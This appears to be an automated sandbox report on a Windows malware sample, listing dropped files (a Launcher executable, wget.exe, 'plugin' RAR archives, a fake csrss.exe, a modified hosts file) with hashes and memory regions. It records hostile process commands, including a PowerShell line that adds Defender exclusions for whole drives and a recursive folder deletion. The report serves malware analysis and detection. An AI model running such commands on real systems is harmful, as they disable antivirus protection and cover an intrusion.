| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 92d8d95e08e0ed032c475e03b7b71a39 |
| SHA1 | 8097f925f154beb29dafd67be1aca9ac77216d35 |
| SHA256 | 1ae0280cb090310b1958b961de3a62f2c845e5a90c2085623055873a7b04f945 |
| SHA512 | 98c316f89214de24c3fc493d0ac54e4cbe745fbd3c726c697309276a3628cdb330708eaeda972d22c3096cf525a0befa3a6f906586c68fb69c7736820e8c823a |
memory/2064-191-0x0000000000770000-0x0000000000771000-memory.dmp
memory/2132-240-0x00000000732F0000-0x000000007389B000-memory.dmp
memory/2132-241-0x00000000028E0000-0x0000000002920000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
memory/2032-337-0x00000000002D0000-0x00000000002D1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2655e2a76e885674671adc7b49775d0f |
| SHA1 | e898c14453462ff74890ae7a0605f9f3768dc186 |
| SHA256 | cebbed461ce55e262cf0925b3cfd5d3284987e3bd9ca15ba92bf89c1a27a1c77 |
| SHA512 | 6ef55295c0ba3715352984283d0b83b32ba0148a2d72b63a3ad83fd96ebc57d9f62b63bda6210222c306aa4fb4d541cc101cbf4c3ded863395d3a17bd87baf5c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | f26050082c253bf4fae497bfe9298cf8 |
| SHA1 | 44da3b4df3a8c6c685f4bbaeb0729c0c561e0ff5 |
| SHA256 | 1af3c67817862c85b454f35e67626b313d0b2898e97d7f24e9c843238556134d |
| SHA512 | 32067a98e18e0bbd2cf38ac67d80c690b199202a9316d2ed86ba5482551d674eade77a3def878bdcc9877ee161b72b942c5784e4a3dfe760a582a62e273b84e0 |
memory/2724-388-0x00000000732F0000-0x000000007389B000-memory.dmp
memory/2724-389-0x0000000003050000-0x0000000003090000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 69181a231548b6ec4ebdb9e8fa2ae164 |
| SHA1 | aa9def129e58f3226e98289aeb9a8619a5ce37a2 |
| SHA256 | cc8bfcaea245a8f5bea718a9e6718860de34eefad4ee9210f182d33ddd80878d |
| SHA512 | fd4ed0dda7e777a14417f22c82fd51157389fd7a2f1217785a68f3899babc830eb98eba8c3346ae5a0498b3ed57631e227961e8e2e045605ee71e04e88c974fe |
memory/2724-432-0x00000000732F0000-0x000000007389B000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | f60f7771862f3033bb8c4ed8b606e237 |
| SHA1 | 895528e7f626908d432118ef83d1b77c86188614 |
| SHA256 | ee56c042191fbbebb1080b57fd6588391e64a76a500e5908e07d9b6c86b1ffa3 |
| SHA512 | 3ab3388ac3731538f7d39ba460e8e21d76691e50aa3e38b0654d9c543ab1a81c77c55b04565998d67450960a2cec6c89bfe7082b6148053809b71b80fc63f212 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 3b90f8e1575171630c6726251b2115b8 |
| SHA1 | 5ad9ab0352052ebdad5ea12266b0f36a0c2d1876 |
| SHA256 | 4ea8337c328efa59b8107797533cb4240da99b3ae4f91a3d8d095a6192a253c1 |
| SHA512 | 9cb1d0de46f007dbba26540013efc47c38b68542838af4f7822c887b4ffaf15d66a67f907c82b14f7a14ecc709afebec7ddfbeeb0456e763fcf1389649a5cf4c |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | c97b549ec1631b3a00810dd5af451467 |
| SHA1 | 2364222b46a4953fc7a94d4128be3c4e7a7ff3c9 |
| SHA256 | 23478ae229e0bdfcf7c620faf507902781236ac937401b0da5837eb666d77957 |
| SHA512 | 3a4e34f44f490114149384b77eef2c067a8e54e06cc413a6da835faf884e5ca143c28b16602800c35971ab81821bb717c36fb84c22dc5e04f11b9236168bb772 |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 2fbe28f784da9caf6cbeefca0a50bb61 |
| SHA1 | bfa34c66f23a807f9fb9c2e652a8c73aee9d7682 |
| SHA256 | 6ca1e09b19c03cf7c3ade1521f9758631379d5fa68ec06cbaf815e0dc5cc3669 |
| SHA512 | b1eec0bdf023a8c375690fda2aacb3511e8c0ce87cb9ffe4380fa204616e1db8cda6de9742a7bc3c68bffce7805098283eedb60e183396327a462fd2bf5bf04e |
memory/1320-511-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
| MD5 | 907c1e4e19a50fff3ac19087ebe04295 |
| SHA1 | 699187f7bfb7e65d05d445b46f9583c77f519c0e |
| SHA256 | 115c37d38945ee56b0e7a23cf90c60f63191aaf312c207c8ac5ab719a1500158 |
| SHA512 | 5da0d6b688c09d926881512f698ec8d205c08c37eb51f2a18471aa3f99aeb7a771030c170ea933cc67f17852a433359ce9c51fcfcff780cb6d35d78d0eb5e9c7 |
memory/2132-519-0x00000000732F0000-0x000000007389B000-memory.dmp
\Users\Admin\AppData\Roaming\services\plugin0228
| MD5 | 626fb04cdd464c32c07e7a9610f7fb11 |
| SHA1 | cf6d3a911e2b915b52f00777a6bc984f2a26f61a |
| SHA256 | 3d1c1ba663250f344a2a2bc64c294755ec2367d03540cd851485c47a1b858c09 |
| SHA512 | 7fcfb2971e2ccc837af3325cbffa4560afe04d43491ce08524f25659ae78d798c4996764ed1ca56152b7fc65ade16f0e064a6d2a6ffb1f7d818bcc44e761f338 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/940-527-0x0000000000A30000-0x0000000000AC2000-memory.dmp
memory/940-528-0x000000006FDB0000-0x000000007049E000-memory.dmp
memory/2132-529-0x00000000028E0000-0x0000000002920000-memory.dmp
memory/940-530-0x00000000008C0000-0x0000000000900000-memory.dmp
memory/892-532-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-537-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-538-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/892-536-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-540-0x0000000000400000-0x000000000046E000-memory.dmp
memory/940-543-0x000000006FDB0000-0x000000007049E000-memory.dmp
memory/892-544-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-546-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-535-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-534-0x0000000000400000-0x000000000046E000-memory.dmp
memory/892-533-0x0000000000400000-0x000000000046E000-memory.dmp
memory/1076-556-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | 5c25f9d663d5046a6ea67ddb0a38a0b7 |
| SHA1 | 45954bd948dc3fe167ec61f7f26c7d3f10a75456 |
| SHA256 | 342a712649402888b6b9dbe23e32977b79468df10024d485b117e8a1c5019e2e |
| SHA512 | b296587b47d7f9b6d35990e28bef6551201814c8ab7bf601c8e1c976f64e36686eb5495ad0eacc4268168c865713f551442767f5215d5864f20d23ed1c1d9ca4 |
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
| MD5 | 82a56a666981e9e163a1aba74dc70aa8 |
| SHA1 | 709e44e71ff38d0771d839b74f270c23daa42f64 |
| SHA256 | c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6 |
| SHA512 | ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0 |
\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5923f9aebbd8823243abe4aed8440722 |
| SHA1 | 45fa1d4b3ba7215258c101474460128e6baab023 |
| SHA256 | 2481bd7384999300c927b6df6da7cd8530ef3e6c8dcdcd7b15905f54876e69cc |
| SHA512 | 7dd991cf7d0bc642722584ec6562ffaf98964a303d263cf05305c6ba7e4f5d42cbd22d8ac022cb3ca3ef80b4817158824c32a66acf578bfd7c698e26871ec833 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | cc4663c472430ec6a134bef0cd91b4db |
| SHA1 | 82663163ce7684dc841f194c8fdc310129656629 |
| SHA256 | d0d2cf544534e478b36e72127ace46e35ef4ad506168a67651717d674a5dbf8e |
| SHA512 | a178d30bfe3a632b2b6f2abc48d6621e5aef56257a4f0d5755a19d2edf11a007776d301285d25cf3bdb2e22e5ef0a1f41b16091d6988a7a380e0c8abeb1f2219 |
\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 93df559b47f6d389a6e8ea691512181e |
| SHA1 | e328e083126d1f6cdf8ebb62c4862ce4c4b2ab34 |
| SHA256 | 0cdc6cab294b2810a9b02b53472cfa19ee1a902d4dd970c64a071c9074c3b5cc |
| SHA512 | 089289cfde470b7d4d920b2614aeca7b7af631525e019f322e1046dec6f8e93fae09af4a80e727ddd1df5c4363e3d2f04f52a6c8624634b2388ab7c2765637fa |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5ba443e64e0470a395963cd22d9a4d3e |
| SHA1 | 06a01f1678ef638a64246f9a3e66bbc02860751a |
| SHA256 | bd007fca2ab1bfd5b7beaadad8e5398300738542efa5e1bc3c18d5410e3ea38c |
| SHA512 | ffcc47119df77dc62cdd50ff7f04bba94d46acb04a2ae79e9a5d53fb51ecd3232e76f09e1ed054533ca6b6d6ff9ecbd52331f99c99abbdebb7a518843449f2a2 |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 62185595bbcf4b826eb5469666bc714c |
| SHA1 | 5ef3394be9b9a80677cacc40a2ba641ae3de0f39 |
| SHA256 | ed5b8830d0bce2d9ea7aa0d9d90cbf9b906695096767a8040288e0024ad78e26 |
| SHA512 | 262d0fb0507bf29c838a0cc1dca68212667934723da5e3e9b40aa84b0676d5ecc62da36e5fec98ba9e43e9bff1a2d7e347a84c07ad739b1e1c337cebe7c167cc |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 08c19f7f8097b98c293dbcca676f4030 |
| SHA1 | b3b78f7f05bb595175592eff785d462a71f0e547 |
| SHA256 | 83226d02897b5d65ddbe44f1085820c9ab2cbc7629be8732b46f54aaed074a68 |
| SHA512 | 8e4795386cf0edc6cc9db97aa0fff5af4f97aeabff1e09a875bb6d67306648769b8c51f3e18f413d8d1c2a7891b70eeb6efa125eb0cca6957948c3f587e3e403 |
memory/2032-567-0x0000000005790000-0x0000000006125000-memory.dmp
memory/2032-571-0x0000000005790000-0x0000000006125000-memory.dmp
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | dc7600a49a0c309dabc44f27de286c4a |
| SHA1 | 989f8d07e584b88b3e3915bdb931a888c6cdc4e1 |
| SHA256 | 26a4e3485a71daeba27ae357fa40e69b178bea9972bca6be522b02cc19412f4c |
| SHA512 | 80728c670924fe77cfa9a663101cbe4e895570ab42b7123656641e86f4e1974845405ea62318887378762d5c6a0a3dd81fe858b5f2c91826d172411421d07ae4 |
memory/632-572-0x000000013FCD0000-0x0000000140665000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | b1dadb6a6f4352ac7c5550edcfc9a26e |
| SHA1 | 1e9132fd9ffb482a32ebda6be611d94fb8860a0a |
| SHA256 | a4f1d9050333968d0d2f8e973c560900ba20d4a9b078418382f2dfcc8ec031b4 |
| SHA512 | 49ba8107ddbef6f8092dcd35bc228999d26dd6fa02ab831f511a8b81d48bc395e8a4ce6b2a879f0e3547bfbe9364a7346331db23874f05eac0e574853e998458 |
memory/1540-576-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins0228.rar
| MD5 | bb3d6b72aaed5ded805671498c11ca52 |
| SHA1 | 718dfed5265c72fa974061d9ee7ae4bae56d6f49 |
| SHA256 | 76960fd3b763ec4b563151c332030d898a9edb58697ebb2058e388f227f2619a |
| SHA512 | dbe7c5cf11a2003990af7fdb76fa00ae56757a0a2327a598a4fb70a1e65e08cbf2290f00e86f738534cd3e4d1c185ca729709a11d759aca04c256df3d9d0694b |
memory/2856-585-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2856-584-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/2856-586-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2856-587-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2856-588-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2856-589-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2856-591-0x0000000002A30000-0x0000000002AB0000-memory.dmp
memory/2856-594-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/632-597-0x000000013FCD0000-0x0000000140665000-memory.dmp
\ProgramData\SystemFiles\csrss.exe
| MD5 | 1622f2d763733fe78cd6e6e446ec01a1 |
| SHA1 | b606e800f2c787f411e8fd3f2b8a6b52f8ae215f |
| SHA256 | a47632f601940f48ad1498c3fe5689680f90b0798ebd246ea2db53040ffcd601 |
| SHA512 | 07a833cff05500dfac60f77816ca88346e4e55bdae8c3245eeae34b7f2c8df4d08320d90ae0eca6d7df89794d3f67221e09b526fee6face8a575246a488108ba |
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | a732f1d295f160607cc0598d3b784480 |
| SHA1 | 66b3301dca81faa9262cd160b8940c0d6da329c0 |
| SHA256 | fe2a9807c3053bc4bb39b16ae7a8d9357c7865dc367aca32b4b19870c82b88ba |
| SHA512 | 1b22637314ce91ac37d516d9c17bc5e2e8b5f0533c181bcfa042e1366f662bf2a44b17f03eece21c87989300994f0709fc6eb286b13dd24d05d5c442e2c2347e |
\ProgramData\SystemFiles\csrss.exe
| MD5 | 503cd13732f073017c1cfa04001e41e7 |
| SHA1 | 4933382f6ac5e4fb60dc2f795fb83d5301e6dcfa |
| SHA256 | b241e4e7606eef11487c40bd932bace873cb8806ac9a2d6137fcd79b616bfeca |
| SHA512 | 4c4ed3c99254fa3d3a4ce274dbe8283c78744add5f053707b60a3ed8b89ac1d297a45a7812ff1ead334af743fbe1c64f01df331dd96edb16dace8a17fddbb067 |
memory/1664-601-0x000000013F360000-0x000000013FCF5000-memory.dmp
memory/588-603-0x00000000014E0000-0x0000000001560000-memory.dmp
memory/588-602-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/588-604-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/588-605-0x00000000014E0000-0x0000000001560000-memory.dmp
memory/2032-606-0x0000000005790000-0x0000000006125000-memory.dmp
memory/2032-607-0x0000000005790000-0x0000000006125000-memory.dmp
memory/588-608-0x00000000014E0000-0x0000000001560000-memory.dmp
\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | e1b77451ec2dc82087eaff231d1fe7fb |
| SHA1 | 5e5ce20b411508343f6482c6124ebbd5a2c91358 |
| SHA256 | 8920996ac3aab57499b1bd2b3d9c6dc5066c09b10351c31c296e7b5282645a6c |
| SHA512 | 6c07ae0ad70d129ab7a10cb190004435909f4d4e9e86776a3cd149d06c088b0662696d277517072912ffd75ce532369fc9fddee08f2ab3296f03c887e7b6501a |
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | 50067874be1aca9c03c561617bac8421 |
| SHA1 | 37c793ea5a810be7d0fc54193e0380dedf6a82e8 |
| SHA256 | 71f6f8ab6fd7451b006ea1d8d58ddfd01a91f7409b6c5fa8dc719435e1f4e89e |
| SHA512 | 34af187fc18c56605dea122aacc6d546c5bb59ced7fc5c2707ed35895ffab0ebbff661b092ab6f285e30751dbc14aa5bd6f62d90b3560352638b6b2e01107c7e |
memory/588-612-0x00000000014E0000-0x0000000001560000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | 0f40c938cce6c869f4f3a442e1368684 |
| SHA1 | 9c1a1d887196d4cda13dcf112dcdbe97b9d1a111 |
| SHA256 | b842d584d6369d5508996b09c443e3d748e0d491a0fab09a4980ec5440931a94 |
| SHA512 | 97921807489acc79a444fa7ef021f98afb1630ed8b94df98feca144870a5f11d046178ea3df305032fc1e2fedd66efffbdd8f14aac2a3039c879ad639f5f36c9 |
memory/2988-614-0x000000006F710000-0x000000006FDFE000-memory.dmp
memory/588-615-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2988-613-0x00000000000F0000-0x000000000016A000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 7575c74a6cb2582fe872ec4e5c34d9ae |
| SHA1 | 8616d5c5687df7133cb3320d131ab82a25197ca7 |
| SHA256 | 5cfc757280526df2130740c4fc1722623bb6a51866af1b4f4fba8acaf2b23064 |
| SHA512 | 8afc0d7c08397a0efc03b313fd9a4986f29c3415ccd640e582fa60a0d3696539243e8d3859cd1b06aea632646b5eb31ffff5cc73ca3df1ac178f44397607b860 |
memory/1880-618-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1880-622-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1880-624-0x0000000140000000-0x000000014000D000-memory.dmp
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | 828fd6d7f7cf0fb6745fd777136e5e3f |
| SHA1 | a4a7bd66e2bc3c495047140b9c35cdc0eb9efd70 |
| SHA256 | 5e39ebea2d3afa9fcebbc8048a8df8c1d0cb726840489f4b8839a45bf7bbbb9f |
| SHA512 | 1caa219ba53f989f37d25610f27783c359f7ff6d7a9f8415e7b3b063060cb0d02c03996345777a879207fb7361e48e51c4629627875020b053fdb54efd79a2f0 |
memory/2932-627-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-629-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-626-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1880-621-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2932-630-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2988-632-0x0000000004890000-0x00000000048D0000-memory.dmp
memory/1664-633-0x000000013F360000-0x000000013FCF5000-memory.dmp
memory/2932-635-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1880-620-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2932-636-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1880-619-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2080-638-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-637-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-639-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-640-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-641-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-642-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-643-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2080-645-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-644-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-646-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-647-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-650-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-651-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-648-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-649-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2932-652-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2988-654-0x000000006F710000-0x000000006FDFE000-memory.dmp
memory/2932-655-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-656-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-657-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-659-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2080-660-0x0000000000240000-0x0000000000241000-memory.dmp
memory/2080-658-0x0000000000400000-0x0000000000449000-memory.dmp
memory/2932-661-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-662-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-663-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-664-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-665-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-666-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-667-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-668-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-670-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-669-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/2932-673-0x00000000772B0000-0x0000000077459000-memory.dmp
memory/2440-680-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2440-681-0x00000000013F0000-0x0000000001470000-memory.dmp
memory/2440-684-0x00000000013F0000-0x0000000001470000-memory.dmp
memory/2440-683-0x00000000013F0000-0x0000000001470000-memory.dmp
memory/2440-682-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
memory/2440-689-0x000007FEF5780000-0x000007FEF611D000-memory.dmp
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | dac7dea4ffd76a03f052c6a31a1233ce |
| SHA1 | 1b08dcebc80369106b4022b417ab6391adcd9301 |
| SHA256 | 1978f676cbe6a20f2a3ac14196674469a0962443f1e65f586a4cee66e61fddde |
| SHA512 | 2ede6120cdda4bfbed13f13b99e94fb7055d0639735f4952a74ceaf6d60acb7d42fbba2506ea0d45ed5365d580277638b8854773eabf1fed273db40d61875501 |
memory/2232-693-0x000000013FCC0000-0x0000000140655000-memory.dmp
memory/2948-695-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-694-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2948-696-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2948-698-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-697-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-699-0x00000000010B0000-0x0000000001130000-memory.dmp
memory/2948-700-0x000007FEF4DE0000-0x000007FEF577D000-memory.dmp
memory/2232-704-0x000000013FCC0000-0x0000000140655000-memory.dmp
memory/2932-707-0x0000000000940000-0x0000000000960000-memory.dmp
memory/2132-708-0x00000000732F0000-0x000000007389B000-memory.dmp
memory/2932-709-0x00000000772B0000-0x0000000077459000-memory.dmp
memory/2932-710-0x0000000000940000-0x0000000000960000-memory.dmp
memory/2932-715-0x0000000000940000-0x0000000000960000-memory.dmp
memory/2932-716-0x00000000009B0000-0x00000000009D0000-memory.dmp
memory/2932-722-0x0000000000940000-0x0000000000960000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240221-en
Max time kernel
1799s
Max time network
1819s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240221-en
Max time kernel
1801s
Max time network
1820s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/1812-0-0x00000000002E0000-0x00000000002E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab8D34.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar8D56.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar90DA.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/2632-78-0x0000000073450000-0x00000000739FB000-memory.dmp
memory/2632-158-0x00000000024E0000-0x0000000002520000-memory.dmp
memory/2632-170-0x0000000073450000-0x00000000739FB000-memory.dmp
